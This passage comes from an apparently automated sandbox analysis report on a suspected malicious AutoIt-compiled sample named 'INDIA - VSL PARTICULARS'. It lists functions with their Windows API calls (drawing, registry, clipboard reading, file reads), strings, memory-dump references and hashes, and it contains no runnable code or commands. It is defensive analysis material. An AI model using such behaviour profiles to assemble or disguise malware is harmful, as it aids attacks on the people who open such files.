                              • SetBkColor.GDI32(?,?), ref: 004309A6
                              • SelectObject.GDI32(?,?), ref: 004309B4
                              • InflateRect.USER32(?,000000FF,000000FF), ref: 004309D9
                              • RoundRect.GDI32(?,?,?,?,?,00000005,00000005), ref: 004309F4
                              • GetWindowLongW.USER32(?,000000F0), ref: 00430A09
                              • SendMessageW.USER32(00000000,0000000E,00000000,00000000), ref: 00430A29
                              • GetWindowTextW.USER32(00000000,00000000,?), ref: 00430A5A
                              • InflateRect.USER32(?,000000FD,000000FD), ref: 00430A86
                              • DrawFocusRect.USER32(?,?), ref: 00430A91
                              • GetSysColor.USER32(00000011), ref: 00430A9F
                              • SetTextColor.GDI32(?,00000000), ref: 00430AA7
                              • DrawTextW.USER32(?,?,000000FF,?,00000105), ref: 00430ABC
                              • SelectObject.GDI32(?,?), ref: 00430AD0
                              • DeleteObject.GDI32(00000105), ref: 00430ADC
                              • SelectObject.GDI32(?,?), ref: 00430AE3
                              • DeleteObject.GDI32(?), ref: 00430AE9
                              • SetTextColor.GDI32(?,?), ref: 00430AF0
                              • SetBkColor.GDI32(?,?), ref: 00430AFB
                              Memory Dump Source
                              • Source File: 00000000.00000002.2190347807.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000000.00000002.2190325185.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2190405144.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2190459368.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2190509021.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2190533171.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2190533171.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2190594120.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_400000_INDIA - VSL PARTICULARS.jbxd
                              Similarity
                              • API ID: Color$ObjectText$RectSelect$BrushCreateDeleteDrawInflateWindow$FocusLongMessageRoundSendSolid
                              • String ID:
                              • API String ID: 1582027408-0
                              • Opcode ID: 0fc54ca7880b8250f5455aad5081468a4898125874aa09f0f002b05b6088d479
                              • Instruction ID: b12033eb3fa9204049de4d7caedd8dcf025edfa44633034d6aae7949f8ecba99
                              • Opcode Fuzzy Hash: 0fc54ca7880b8250f5455aad5081468a4898125874aa09f0f002b05b6088d479
                              • Instruction Fuzzy Hash: 6F713071900209BFDB04DFA8DD88EAEBBB9FF48710F104619F915A7290D774A941CFA8
                              Function 0046B9D7 Relevance: 40.7, APIs: 17, Strings: 6, Instructions: 415registryCOMMON
                              Download Yara Rule
                              APIs
                              • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 0046BAE6
                              • RegCreateKeyExW.ADVAPI32(?,?,00000000,00484EA8,00000000,?,00000000,?,?,?), ref: 0046BB40
                              • RegCloseKey.ADVAPI32(?,00000001,00000000,00000000,00000000), ref: 0046BB8A
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.2190347807.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000000.00000002.2190325185.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2190405144.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2190459368.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2190509021.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2190533171.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2190533171.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2190594120.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_400000_INDIA - VSL PARTICULARS.jbxd
                              Similarity
                              • API ID: CloseConnectCreateRegistry
                              • String ID: REG_BINARY$REG_DWORD$REG_EXPAND_SZ$REG_MULTI_SZ$REG_QWORD$REG_SZ
                              • API String ID: 3217815495-966354055
                              • Opcode ID: 4426f4ce80acdf53cad9cfed0f21911b2ffa5f4c9bc0ee367fa9e54fa9040c70
                              • Instruction ID: 14c723365299aea1e32a80c9e2d98689f85295d348ed372ee81e16963ac3f886
                              • Opcode Fuzzy Hash: 4426f4ce80acdf53cad9cfed0f21911b2ffa5f4c9bc0ee367fa9e54fa9040c70
                              • Instruction Fuzzy Hash: BCE18171604200ABD710EF65C885F1BB7E8EF88704F14895EB949DB352D739ED41CBA9
                              Function 004565B2 Relevance: 40.5, APIs: 20, Strings: 3, Instructions: 291windowCOMMON
                              Download Yara Rule
                              APIs
                              • GetCursorPos.USER32(?), ref: 004566AE
                              • GetDesktopWindow.USER32 ref: 004566C3
                              • GetWindowRect.USER32(00000000), ref: 004566CA
                              • GetWindowLongW.USER32(?,000000F0), ref: 00456722
                              • GetWindowLongW.USER32(?,000000F0), ref: 00456735
                              • DestroyWindow.USER32(?), ref: 00456746
                              • CreateWindowExW.USER32(00000008,tooltips_class32,00000000,00000003,80000000,80000000,80000000,80000000,00000000,00000000,00000000,00000000), ref: 00456794
                              • SendMessageW.USER32(00000000,00000432,00000000,0000002C), ref: 004567B2
                              • SendMessageW.USER32(?,00000418,00000000,?), ref: 004567C6
                              • SendMessageW.USER32(?,00000439,00000000,0000002C), ref: 004567D6
                              • SendMessageW.USER32(?,00000421,?,?), ref: 004567F6
                              • SendMessageW.USER32(?,0000041D,00000000,00000000), ref: 0045680C
                              • IsWindowVisible.USER32(?), ref: 0045682C
                              • SendMessageW.USER32(?,00000412,00000000,D8F0D8F0), ref: 00456848
                              • SendMessageW.USER32(?,00000411,00000001,0000002C), ref: 0045685C
                              • GetWindowRect.USER32(?,?), ref: 00456873
                              • MonitorFromPoint.USER32(?,00000001,00000002), ref: 00456891
                              • GetMonitorInfoW.USER32(00000000,?), ref: 004568A9
                              • CopyRect.USER32(?,?), ref: 004568BE
                              • SendMessageW.USER32(?,00000412,00000000), ref: 00456914
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.2190347807.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000000.00000002.2190325185.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2190405144.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2190459368.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2190509021.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2190533171.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2190533171.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2190594120.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_400000_INDIA - VSL PARTICULARS.jbxd
                              Similarity
                              • API ID: MessageSendWindow$Rect$LongMonitor$CopyCreateCursorDesktopDestroyFromInfoPointVisible
                              • String ID: ($,$tooltips_class32
                              • API String ID: 225202481-3320066284
                              • Opcode ID: d36279d6046af7916fa8cb53b873a9c87cdaa8c87180e7b1c59dea88ca998a74
                              • Instruction ID: fcdb4dd5bfb9c4cfeeadc9569793f3eee26ed74f2078e1bfb0220ba6a1b85fea
                              • Opcode Fuzzy Hash: d36279d6046af7916fa8cb53b873a9c87cdaa8c87180e7b1c59dea88ca998a74
                              • Instruction Fuzzy Hash: 4CB17170A00205AFDB54DFA4CD85BAEB7B4BF48304F10895DE919BB282D778A949CB58
                              Function 0046DCB4 Relevance: 36.2, APIs: 24, Instructions: 247clipboardCOMMON
                              Download Yara Rule
                              APIs
                              • OpenClipboard.USER32(?), ref: 0046DCE7
                              • IsClipboardFormatAvailable.USER32(0000000D), ref: 0046DCF5
                              • GetClipboardData.USER32(0000000D), ref: 0046DD01
                              • CloseClipboard.USER32 ref: 0046DD0D
                              • GlobalLock.KERNEL32(00000000), ref: 0046DD37
                              • CloseClipboard.USER32 ref: 0046DD41
                              • IsClipboardFormatAvailable.USER32(00000001), ref: 0046DD81
                              • GetClipboardData.USER32(00000001), ref: 0046DD8D
                              • CloseClipboard.USER32 ref: 0046DD99
                              Memory Dump Source
                              • Source File: 00000000.00000002.2190347807.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000000.00000002.2190325185.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2190405144.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2190459368.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2190509021.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2190533171.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2190533171.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2190594120.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_400000_INDIA - VSL PARTICULARS.jbxd
                              Similarity
                              • API ID: Clipboard$Close$AvailableDataFormat$GlobalLockOpen
                              • String ID:
                              • API String ID: 15083398-0
                              • Opcode ID: 5d52f7a8e2fbd0ab087c8c139685d9916ac200a5779b15fccd04bfb456a25eb2
                              • Instruction ID: c6f05cb0c77453757aa6b00544986da50a17ac1627668c5aecb5782462309948
                              • Opcode Fuzzy Hash: 5d52f7a8e2fbd0ab087c8c139685d9916ac200a5779b15fccd04bfb456a25eb2
                              • Instruction Fuzzy Hash: CE81B072704201ABD310EF65DD8AB5EB7A8FF94315F00482EF605E72D1EB74E905879A
                              Function 00471BC9 Relevance: 35.3, APIs: 18, Strings: 2, Instructions: 313windowtimeCOMMON
                              Download Yara Rule
                              APIs
                                • Part of subcall function 004115D7: _malloc.LIBCMT ref: 004115F1
                              • GetWindowRect.USER32(?,?), ref: 00471CF7
                              • GetClientRect.USER32(?,?), ref: 00471D05
                              • GetSystemMetrics.USER32(00000007), ref: 00471D0D
                              • GetSystemMetrics.USER32(00000008), ref: 00471D20
                              • GetSystemMetrics.USER32(00000004), ref: 00471D42
                              • SystemParametersInfoW.USER32(00000030,00000000,?,00000000), ref: 00471D71
                              • GetSystemMetrics.USER32(00000007), ref: 00471D79
                              • SystemParametersInfoW.USER32(00000030,00000000,?,00000000), ref: 00471DA3
                              • GetSystemMetrics.USER32(00000008), ref: 00471DAB
                              • GetSystemMetrics.USER32(00000004), ref: 00471DCF
                              • SetRect.USER32(?,00000000,00000000,?,?), ref: 00471DEE
                              • AdjustWindowRectEx.USER32(?,?,00000000,00000040), ref: 00471DFF
                              • CreateWindowExW.USER32(00000040,AutoIt v3 GUI,?,?,?,?,?,?,?,00000000,00400000,00000000), ref: 00471E35
                              • SetWindowLongW.USER32(00000000,000000EB,?), ref: 00471E6E
                              • GetClientRect.USER32(?,?), ref: 00471E8A
                              • GetStockObject.GDI32(00000011), ref: 00471EA6
                              • SendMessageW.USER32(?,00000030,00000000), ref: 00471EB2
                              • SetTimer.USER32(00000000,00000000,00000028,00462986), ref: 00471ED9
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.2190347807.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000000.00000002.2190325185.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2190405144.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2190459368.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2190509021.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2190533171.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2190533171.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2190594120.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_400000_INDIA - VSL PARTICULARS.jbxd
                              Similarity
                              • API ID: System$Metrics$Rect$Window$ClientInfoParameters$AdjustCreateLongMessageObjectSendStockTimer_malloc
                              • String ID: @$AutoIt v3 GUI
                              • API String ID: 867697134-3359773793
                              • Opcode ID: a77764dc97b758b9f138980a30eafcd252b45b083a0cf55b9ff7e92d3de70106
                              • Instruction ID: 8cf5fd9e7b0abf2f472dad9b41bae804ea9cb1b32c1b51d65689880f1cfe2d6c
                              • Opcode Fuzzy Hash: a77764dc97b758b9f138980a30eafcd252b45b083a0cf55b9ff7e92d3de70106
                              • Instruction Fuzzy Hash: 7DC17F71A402059FDB14DFA8DD85BAF77B4FB58714F10862EFA09A7290DB78A840CB58
                              Function 00433A13 Relevance: 35.2, APIs: 15, Strings: 5, Instructions: 196COMMON
                              Download Yara Rule
                              APIs
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.2190347807.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000000.00000002.2190325185.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2190405144.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2190459368.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2190509021.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2190533171.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2190533171.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2190594120.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_400000_INDIA - VSL PARTICULARS.jbxd
                              Similarity
                              • API ID: _wcscat$FileInfoVersion$QuerySizeValue__wcsicoll_wcscpy_wcslen_wcsncpy
                              • String ID: %u.%u.%u.%u$04090000$DefaultLangCodepage$StringFileInfo\$\VarFileInfo\Translation
                              • API String ID: 1503153545-1459072770
                              • Opcode ID: b1dcb5dacd1f2072149b846e72ce4b3dcf4a50df91d710b51ce636c939b7599d
                              • Instruction ID: bf9a9138137c8e48d15734b0b0bf1383f69a7efb75f9ce998fc77f2ad016157b
                              • Opcode Fuzzy Hash: b1dcb5dacd1f2072149b846e72ce4b3dcf4a50df91d710b51ce636c939b7599d
                              • Instruction Fuzzy Hash: D551F672A402043BD610BB269C43EFFB36C9F49715F10055FFE09A6242EA7DEA5183AD
                              Function 00469296 Relevance: 33.4, APIs: 6, Strings: 13, Instructions: 116COMMON
                              Download Yara Rule
                              APIs
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.2190347807.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000000.00000002.2190325185.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2190405144.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2190459368.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2190509021.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2190533171.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2190533171.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2190594120.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_400000_INDIA - VSL PARTICULARS.jbxd
                              Similarity
                              • API ID: __wcsicoll$__wcsnicmp
                              • String ID: ACTIVE$ALL$CLASSNAME=$HANDLE=$LAST$REGEXP=$[ACTIVE$[ALL$[CLASS:$[HANDLE:$[LAST$[REGEXPTITLE:$pQH
                              • API String ID: 790654849-32604322
                              • Opcode ID: 29d435e902b015a153743909057decd258383f7606cc46ad0233eead686698a2
                              • Instruction ID: c91e69f26a1c2718e03151092e39642ccf44f92bf630fd0466772f198d10bc2a
                              • Opcode Fuzzy Hash: 29d435e902b015a153743909057decd258383f7606cc46ad0233eead686698a2
                              • Instruction Fuzzy Hash: CA317731A0420966DB10FAA2DD46BAE736C9F15315F20053BBD00BB2D5E7BC6E4587AE
                              Function 00455A89 Relevance: 31.9, APIs: 21, Instructions: 395COMMON
                              Download Yara Rule
                              Memory Dump Source
                              • Source File: 00000000.00000002.2190347807.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000000.00000002.2190325185.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2190405144.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2190459368.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2190509021.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2190533171.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2190533171.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2190594120.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_400000_INDIA - VSL PARTICULARS.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: e5b051fd50d99fa90b2629cec502b0b5abd27188c27a482d59dc70fd2e6235d1
                              • Instruction ID: 62dae473257cc2caee0a49c5626d46440081d624880130feb25903cd50123649
                              • Opcode Fuzzy Hash: e5b051fd50d99fa90b2629cec502b0b5abd27188c27a482d59dc70fd2e6235d1
                              • Instruction Fuzzy Hash: 84C128727002046BE724CFA8DC46FAFB7A4EF55311F00416AFA05DA2C1EBB99909C795
                              Function 00452AC7 Relevance: 31.8, APIs: 21, Instructions: 343COMMON
                              Download Yara Rule
                              APIs
                                • Part of subcall function 00442C5A: __time64.LIBCMT ref: 00442C66
                              • _fseek.LIBCMT ref: 00452B3B
                              • __wsplitpath.LIBCMT ref: 00452B9B
                              • _wcscpy.LIBCMT ref: 00452BB0
                              • _wcscat.LIBCMT ref: 00452BC5
                              • __wsplitpath.LIBCMT ref: 00452BEF
                              • _wcscat.LIBCMT ref: 00452C07
                              • _wcscat.LIBCMT ref: 00452C1C
                              • __fread_nolock.LIBCMT ref: 00452C53
                              • __fread_nolock.LIBCMT ref: 00452C64
                              • __fread_nolock.LIBCMT ref: 00452C83
                              • __fread_nolock.LIBCMT ref: 00452C94
                              • __fread_nolock.LIBCMT ref: 00452CB5
                              • __fread_nolock.LIBCMT ref: 00452CC6
                              • __fread_nolock.LIBCMT ref: 00452CD7
                              • __fread_nolock.LIBCMT ref: 00452CE8
                                • Part of subcall function 00452719: __fread_nolock.LIBCMT ref: 0045273E
                                • Part of subcall function 00452719: __fread_nolock.LIBCMT ref: 00452780
                                • Part of subcall function 00452719: __fread_nolock.LIBCMT ref: 0045279E
                                • Part of subcall function 00452719: _wcscpy.LIBCMT ref: 004527D2
                                • Part of subcall function 00452719: __fread_nolock.LIBCMT ref: 004527E2
                                • Part of subcall function 00452719: __fread_nolock.LIBCMT ref: 00452800
                                • Part of subcall function 00452719: _wcscpy.LIBCMT ref: 00452831
                              • __fread_nolock.LIBCMT ref: 00452D78
                              Memory Dump Source
                              • Source File: 00000000.00000002.2190347807.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000000.00000002.2190325185.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2190405144.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2190459368.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2190509021.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2190533171.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2190533171.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2190594120.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_400000_INDIA - VSL PARTICULARS.jbxd
                              Similarity
                              • API ID: __fread_nolock$_wcscat_wcscpy$__wsplitpath$__time64_fseek
                              • String ID:
                              • API String ID: 2054058615-0
                              • Opcode ID: 0fea368d492e8b0ff51cb8fd7897a71ebf5dc00d39f6f8cf48bc83bd06102a16
                              • Instruction ID: 04d0e47ed4a2b248740d2851a73093f1b496c65d3ae4d984919b8c0089c9d159
                              • Opcode Fuzzy Hash: 0fea368d492e8b0ff51cb8fd7897a71ebf5dc00d39f6f8cf48bc83bd06102a16
                              • Instruction Fuzzy Hash: 6FC14EB2508340ABD720DF65D881EEFB7E8EFC9704F40492FF68987241E6759548CB66
                              Function 0044870C Relevance: 31.8, APIs: 17, Strings: 1, Instructions: 311COMMON
                              Download Yara Rule
                              APIs
                              • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000000,00000013), ref: 004487BD
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.2190347807.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000000.00000002.2190325185.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2190405144.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2190459368.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2190509021.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2190533171.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2190533171.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2190594120.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_400000_INDIA - VSL PARTICULARS.jbxd
                              Similarity
                              • API ID: Window
                              • String ID: 0
                              • API String ID: 2353593579-4108050209
                              • Opcode ID: b0df0e29545e706fc7615ccb9c436c62dbee4145767baabea16aca18bd76baa2
                              • Instruction ID: 06508bea8339de1511a48146ac1d08a96458f0089f80555ee302a354f7131a6f
                              • Opcode Fuzzy Hash: b0df0e29545e706fc7615ccb9c436c62dbee4145767baabea16aca18bd76baa2
                              • Instruction Fuzzy Hash: 35B18BB0204341ABF324CF24CC89BABBBE4FB89744F14491EF591962D1DBB8A845CB59
                              Function 0044A032 Relevance: 31.7, APIs: 21, Instructions: 198windowCOMMON
                              Download Yara Rule
                              APIs
                              • GetSysColor.USER32(0000000F), ref: 0044A05E
                              • GetClientRect.USER32(?,?), ref: 0044A0D1
                              • SendMessageW.USER32(?,00001328,00000000,?), ref: 0044A0E9
                              • GetWindowDC.USER32(?), ref: 0044A0F6
                              • GetPixel.GDI32(00000000,?,?), ref: 0044A108
                              • ReleaseDC.USER32(?,?), ref: 0044A11B
                              • GetSysColor.USER32(0000000F), ref: 0044A131
                              • GetWindowLongW.USER32(?,000000F0), ref: 0044A140
                              • GetSysColor.USER32(0000000F), ref: 0044A14F
                              • GetSysColor.USER32(00000005), ref: 0044A15B
                              • GetWindowDC.USER32(?), ref: 0044A1BE
                              • GetPixel.GDI32(00000000,00000000,00000000), ref: 0044A1CB
                              • GetPixel.GDI32(00000000,?,00000000), ref: 0044A1E4
                              • GetPixel.GDI32(00000000,00000000,?), ref: 0044A1FD
                              • GetPixel.GDI32(00000000,?,?), ref: 0044A21D
                              • ReleaseDC.USER32(?,00000000), ref: 0044A229
                              • SetBkColor.GDI32(?,00000000), ref: 0044A24C
                              • GetSysColor.USER32(00000008), ref: 0044A265
                              • SetTextColor.GDI32(?,00000000), ref: 0044A270
                              • SetBkMode.GDI32(?,00000001), ref: 0044A282
                              • GetStockObject.GDI32(00000005), ref: 0044A28A
                              Memory Dump Source
                              • Source File: 00000000.00000002.2190347807.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000000.00000002.2190325185.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2190405144.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2190459368.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2190509021.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2190533171.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2190533171.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2190594120.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_400000_INDIA - VSL PARTICULARS.jbxd
                              Similarity
                              • API ID: Color$Pixel$Window$Release$ClientLongMessageModeObjectRectSendStockText
                              • String ID:
                              • API String ID: 1744303182-0
                              • Opcode ID: e73dd003506282a75ec33c48a00615cd632731ac0e25c139f5641f86d6275693
                              • Instruction ID: 0380b5c53d8a23173c1b90063483f03488caaf4f58ae5d2001aea5c06c56dff4
                              • Opcode Fuzzy Hash: e73dd003506282a75ec33c48a00615cd632731ac0e25c139f5641f86d6275693
                              • Instruction Fuzzy Hash: E6612531140101ABE7109F78CC88BAB7764FB46320F14876AFD659B3D0DBB49C529BAA
                              Function 00417C20 Relevance: 29.9, APIs: 12, Strings: 5, Instructions: 109libraryloadermemoryCOMMON
                              Download Yara Rule
                              APIs
                              • GetModuleHandleW.KERNEL32(KERNEL32.DLL,?,004164DE), ref: 00417C28
                              • __mtterm.LIBCMT ref: 00417C34
                                • Part of subcall function 004178FF: TlsFree.KERNEL32(00000017,00417D96,?,004164DE), ref: 0041792A
                                • Part of subcall function 004178FF: DeleteCriticalSection.KERNEL32(00000000,00000000,00410E44,?,00417D96,?,004164DE), ref: 004181B8
                                • Part of subcall function 004178FF: _free.LIBCMT ref: 004181BB
                                • Part of subcall function 004178FF: DeleteCriticalSection.KERNEL32(00000017,00410E44,?,00417D96,?,004164DE), ref: 004181E2
                              • GetProcAddress.KERNEL32(00000000,FlsAlloc), ref: 00417C4A
                              • GetProcAddress.KERNEL32(00000000,FlsGetValue), ref: 00417C57
                              • GetProcAddress.KERNEL32(00000000,FlsSetValue), ref: 00417C64
                              • GetProcAddress.KERNEL32(00000000,FlsFree), ref: 00417C71
                              • TlsAlloc.KERNEL32(?,004164DE), ref: 00417CC1
                              • TlsSetValue.KERNEL32(00000000,?,004164DE), ref: 00417CDC
                              • __init_pointers.LIBCMT ref: 00417CE6
                              • __calloc_crt.LIBCMT ref: 00417D54
                              • GetCurrentThreadId.KERNEL32 ref: 00417D80
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.2190347807.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000000.00000002.2190325185.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2190405144.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2190459368.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2190509021.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2190533171.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2190533171.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2190594120.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_400000_INDIA - VSL PARTICULARS.jbxd
                              Similarity
                              • API ID: AddressProc$CriticalDeleteSection$AllocCurrentFreeHandleModuleThreadValue__calloc_crt__init_pointers__mtterm_free
                              • String ID: FlsAlloc$FlsFree$FlsGetValue$FlsSetValue$KERNEL32.DLL
                              • API String ID: 4163708885-3819984048
                              • Opcode ID: b664ad2f65df639e4a6a12b7ff6e2ff430dd15d20f416fce335d42a987fa1153
                              • Instruction ID: ca22d9d2e1075830452d52834408fe47c465c3b6ac2468b12672dd77d4d5938c
